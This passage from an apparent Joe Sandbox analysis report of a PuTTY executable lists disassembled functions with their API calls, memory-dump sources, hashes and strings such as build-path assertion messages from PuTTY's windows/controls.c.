                                                          • Instruction Fuzzy Hash: 38310633B0918697E794FB2AD404BAAF798EFC8B44F454135DE0D83785DE3AD8418710
                                                          Function 00007FF738A729B0 Relevance: 6.1, APIs: 4, Instructions: 64timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CountTickTimer$Kill
                                                          • String ID:
                                                          • API String ID: 2638796510-0
                                                          • Opcode ID: 51aa5687044183c2c8f0d899ffda2a8774aa04fbf9c4dc05245969a7f7d07de3
                                                          • Instruction ID: 902e813fd5fcf349e2b6e03396b67331073717fab4d6f40ce7d885c6f04f2a74
                                                          • Opcode Fuzzy Hash: 51aa5687044183c2c8f0d899ffda2a8774aa04fbf9c4dc05245969a7f7d07de3
                                                          • Instruction Fuzzy Hash: 4F2135A3B1D10352FB60BB65FD10579E360AB89BA0F840332ED0E47B65CD3DE846D618
                                                          Function 00007FF738A36EF0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteObject.GDI32 ref: 00007FF738A36F9B
                                                            • Part of subcall function 00007FF738A6A7F0: closesocket.WS2_32 ref: 00007FF738A6A824
                                                            • Part of subcall function 00007FF738A6A7F0: FreeLibrary.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,00007FF738A3637F,?,?,00000000,?,00007FF738B3F302,00007FF738AA8570), ref: 00007FF738A6A871
                                                            • Part of subcall function 00007FF738A3D6C0: DeleteFileA.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,?,00007FF738A3637F,?,?,00000000,?,00007FF738B3F302,00007FF738AA8570), ref: 00007FF738A3D6F3
                                                          • CoUninitialize.OLE32(00000000,00000000,00000000,?,00007FF738A3637F,?,?,00000000,?,00007FF738B3F302,00007FF738AA8570,?,?,?,?,00007FF738A6F6B8), ref: 00007FF738A36F21
                                                            • Part of subcall function 00007FF738AF6AC4: GetModuleHandleW.KERNEL32 ref: 00007FF738AF6C3F
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Delete$FileFreeHandleLibraryModuleObjectUninitializeclosesocket
                                                          • String ID:
                                                          • API String ID: 88613629-0
                                                          • Opcode ID: 61e0b6b94199caef1ddcbcb90d24975b558727ef33dd826db04b530b0f7524ec
                                                          • Instruction ID: 6fdf1cf7b002589917f4c93ca6b902a89ff9b29b7a0b3943222ddcd638a8406d
                                                          • Opcode Fuzzy Hash: 61e0b6b94199caef1ddcbcb90d24975b558727ef33dd826db04b530b0f7524ec
                                                          • Instruction Fuzzy Hash: AA21A723A0B947A1E694BB11D910678E311AF407B4F840331D92D036D4CFBFE860B339
                                                          Function 00007FF738A3BB40 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Context$CaretCompositionReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3049481515-0
                                                          • Opcode ID: 4dfcff0285de36fb9f08479c44ccde6345fe718fd5cdebbcff73b2e92eb3e90d
                                                          • Instruction ID: e4dae4e423e58ac75eba58b9ee4a104d73808df7a092a742ae9b8a18559a0a54
                                                          • Opcode Fuzzy Hash: 4dfcff0285de36fb9f08479c44ccde6345fe718fd5cdebbcff73b2e92eb3e90d
                                                          • Instruction Fuzzy Hash: DC11D073A09242A7E620FF15E44167AF3A2FB88B84F804131DA4C47758CF7EE842DB18
                                                          Function 00007FF738A3CA90 Relevance: 6.0, APIs: 4, Instructions: 33windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Zoomed$LongMessageSendWindow
                                                          • String ID:
                                                          • API String ID: 594883883-0
                                                          • Opcode ID: b7a0bca231990d15bdd0c2d4641f9651c157c1da2691cf0183ab87685aa30fcb
                                                          • Instruction ID: 4b811f949137153f9f8008bb9067083111e76153eaf2e19b974da4d9d9a35e32
                                                          • Opcode Fuzzy Hash: b7a0bca231990d15bdd0c2d4641f9651c157c1da2691cf0183ab87685aa30fcb
                                                          • Instruction Fuzzy Hash: F9016257F0951292F770AB16E854B36F360DBC8B60F504231CA0E42BA0CE7EE882E724
                                                          Function 00007FF738B0CF14 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 209fileCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastRead
                                                          • String ID: MZx
                                                          • API String ID: 1948546556-2575928145
                                                          • Opcode ID: 4a5d4d2022d1b03820d5cdb7468ff7714c4de170419bced8e15854617a4e90cf
                                                          • Instruction ID: 2dfeff6ed7b99af2d166e7c0612df2934fd13cc26e688d78f1c5594681614743
                                                          • Opcode Fuzzy Hash: 4a5d4d2022d1b03820d5cdb7468ff7714c4de170419bced8e15854617a4e90cf
                                                          • Instruction Fuzzy Hash: 20915893B0C28365E7116A249C60B79DB81AB01BC4FAC4335C66E072E5DF3ED446E32B
                                                          Function 00007FF738B0C2AC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: dda33cbed6721f4c7a33f99ea1ccf3808a2b1fac92a65f78d0cf0f6e76257260
                                                          • Instruction ID: ade7dedb46fdef28cba989d1dd4a21496f2e183fb707151b66e3aed940f0902f
                                                          • Opcode Fuzzy Hash: dda33cbed6721f4c7a33f99ea1ccf3808a2b1fac92a65f78d0cf0f6e76257260
                                                          • Instruction Fuzzy Hash: D241C573728A4292EB10AF25E4547AAF761FB88784F844131EE4D87794DF3DE401D716
                                                          Function 00007FF738A58F50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemText
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
                                                          • API String ID: 3367045223-542146527
                                                          • Opcode ID: 43bd128f912e0c943cf048e71bd0b51245fd787e454e870cc16eb461b612a085
                                                          • Instruction ID: 557c176f1a64348a97555d32605790adf675c42846d673a9344d721d1045bd76
                                                          • Opcode Fuzzy Hash: 43bd128f912e0c943cf048e71bd0b51245fd787e454e870cc16eb461b612a085
                                                          • Instruction Fuzzy Hash: 5431377370A646A1FA10AB46E840BBAE751BB88BD4FC44031EF4D07751EE7EE486E714
                                                          Function 00007FF738A59140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c, xrefs: 00007FF738A5918E
                                                          • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF738A59187
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                                                          • API String ID: 3015471070-3566709245
                                                          • Opcode ID: 4def688f9c62f6e2bfe45905abc220a8dfecc48a59a92f92a1692838ac8dc967
                                                          • Instruction ID: 99e13df5de70281ceb7b22d3e0178d35a88b0f34dc8f11d155ceefe7f38bbe7e
                                                          • Opcode Fuzzy Hash: 4def688f9c62f6e2bfe45905abc220a8dfecc48a59a92f92a1692838ac8dc967
                                                          • Instruction Fuzzy Hash: 3311C373B0A526B1FBA09715E948BA4E750FB85B94F894131CE4D0B791DF3ED881E314
                                                          Function 00007FF738A596B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c, xrefs: 00007FF738A5970E
                                                          • c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel, xrefs: 00007FF738A59707
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel
                                                          • API String ID: 3015471070-1277133168
                                                          • Opcode ID: 01a8d810965e0a34e219106a3b2cf302b880c8495219bb57867a8a7855aba07e
                                                          • Instruction ID: de9ac4e0c437cab251758c5d4af4ca3f65aeca35b5483fc4a3083646c8b7d982
                                                          • Opcode Fuzzy Hash: 01a8d810965e0a34e219106a3b2cf302b880c8495219bb57867a8a7855aba07e
                                                          • Instruction Fuzzy Hash: B511A12370A60595EB609F05EC40BA8F7A0EB44B95F898131DE4D0B750EA3EE485D714
                                                          Function 00007FF738A595F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0, xrefs: 00007FF738A59647
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c, xrefs: 00007FF738A5964E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0
                                                          • API String ID: 3015471070-265503542
                                                          • Opcode ID: 04ae8f3170db193052bd54112cf440f07aff172e220f9eaf77da1a2f60d8a270
                                                          • Instruction ID: 22fd84d2675b8ddbcbb0358f17c40ca493631bf9a92c12e32c1c2acd5c6f049f
                                                          • Opcode Fuzzy Hash: 04ae8f3170db193052bd54112cf440f07aff172e220f9eaf77da1a2f60d8a270
                                                          • Instruction Fuzzy Hash: F611B463B0A605E5EB20AB41E880BB8F750EB44B94F8C4135DE4C0B790EE3EE4C4E714
                                                          Function 00007FF738A59410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX
                                                          • API String ID: 3015471070-587638513
                                                          • Opcode ID: fae7b144c5e7e4902e88dbeaf920ecb3d240f632e5bbda45bd4c546ec2f403d0
                                                          • Instruction ID: ae6a40daaa6096774c24f4d132a1a11a825ea6774da40941c7bd9843ec81b553
                                                          • Opcode Fuzzy Hash: fae7b144c5e7e4902e88dbeaf920ecb3d240f632e5bbda45bd4c546ec2f403d0
                                                          • Instruction Fuzzy Hash: 9E11B463716605D9EB10AB05EC407B8F760EB48BD9FC84131DE4D0B350DA3EE885D314
                                                          Function 00007FF738A59090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
                                                          • API String ID: 3015471070-542146527
                                                          • Opcode ID: 7ab6a3bef2ba10f5f79ca4f9acd1ef136989397879435aa539a51dc11851b2d7
                                                          • Instruction ID: f1effcbbad9ed271eb634927d443b5d5aee6f909aaf9237e2a75923f6fbd5262
                                                          • Opcode Fuzzy Hash: 7ab6a3bef2ba10f5f79ca4f9acd1ef136989397879435aa539a51dc11851b2d7
                                                          • Instruction Fuzzy Hash: 89110677B0A616A1EB10AB02F841979E760BB48FD8FC88531CE0C07751DE3ED486E314
                                                          Function 00007FF738A58E90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemText
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
                                                          • API String ID: 3367045223-542146527
                                                          • Opcode ID: cafe6d9fe275852977179784b0db9419b44ba8cab006a0615187cd9a9abc108b
                                                          • Instruction ID: 563134f9b698b392e602e24d958ee51a3dce95a0eb7129cd36c260569fbe8c06
                                                          • Opcode Fuzzy Hash: cafe6d9fe275852977179784b0db9419b44ba8cab006a0615187cd9a9abc108b
                                                          • Instruction Fuzzy Hash: 24110663B0B546A0EA10BB06E841A79E3A1BF89BD4FC48131CE4D07751EE3EE581E324
                                                          Function 00007FF738A6470F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: BreakClearCloseCommHandle
                                                          • String ID: Error writing to serial device
                                                          • API String ID: 2685284230-3232346394
                                                          • Opcode ID: 67705d588f0b60758abc2e797882ad0b9194a461a85c459c69172f0221ff9d9b
                                                          • Instruction ID: 8f33540ef313e1e4bf661586d2ec9bec65760105f1cea9c6568c696ef9897918
                                                          • Opcode Fuzzy Hash: 67705d588f0b60758abc2e797882ad0b9194a461a85c459c69172f0221ff9d9b
                                                          • Instruction Fuzzy Hash: 9121A76760660292EA21AB56E08033EE360EB45BB0F444331CBAE07FE5CF3DE4459354
                                                          Function 00007FF738A36C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
